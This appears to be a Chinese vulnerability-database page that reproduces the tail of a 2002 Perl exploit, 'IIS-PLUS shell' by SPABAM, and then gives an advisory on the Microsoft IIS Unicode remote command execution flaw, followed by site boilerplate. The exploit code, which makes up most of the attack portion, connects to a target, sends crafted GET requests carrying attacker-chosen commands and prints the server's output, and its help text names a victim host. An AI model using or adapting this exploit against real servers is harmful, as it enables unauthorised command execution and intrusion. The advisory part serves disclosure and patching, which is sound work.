                                ) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection "GET $url$command$shiz HTTP/1.1\r\nHost: $host\r\n\r\n";
}elsif ($probe =~/string/) {
print $connection "HEAD / HTTP/1.1\r\nHost: $host\r\n\r\n";
};

while ( <$connection> ) {
                        @results = <$connection>;
                         };
close $connection;
if ($probe eq "command"){ &output };
if ($probe eq "string"){ &output };
};
sub output{
print "\nOUTPUT FROM $host. \n\n";
my $display;
if ($probe eq "string") {
                        my $X;
                        for ($X=0; $X<=10; $X++) {
                        $display = $results[$X];
                        if (defined $display){print "$display";};
                        sleep 1;
                                };
                        }else{
                        foreach $display (@results){
                            print "$display";
                            sleep 1;
                                };
                          };
};
sub exit{
print "\n\n\n



ANDREA SPABAM 2002.";
print "\nspabam.da.ru spabam\@go.to";
print "\n\n\n";
exit;
};
sub help {
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\n

        IIS-PLUS shell v 3.7 by SPABAM. 2002. spabam\@yahoo.com";
print "\n

http://www.securityfocus.com/bid/1806/exploit/
";
print "\n A IIS HTTP exploit for Micro\$oft WebServers using 450 URL.";
print "\n
note.. web directory is normally c:\\Inetpub\\wwwroot";
print "\n";
print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
print "\n port: 80 (normally) or other (like https) (RETURN for 80)";
print "\n Command: SCAN URL HELP QUIT";
print "\n\n\n";		

- 漏洞信息

436
Microsoft IIS Unicode Remote Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

Microsoft Internet Information Server (IIS) contain a flaw that allows a remote attacker to access any file or folder on the Web Server with "anonymous" access. The issue is due to IIS failing to handle Unicode characters in URI requests. By replacing slashes and backslashes with their Unicode equivilent, an attacker can bypass the sanity checks present in IIS that would normally filter and deny such requests.

- 时间线

2000-10-17 Unknow
2000-10-17 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站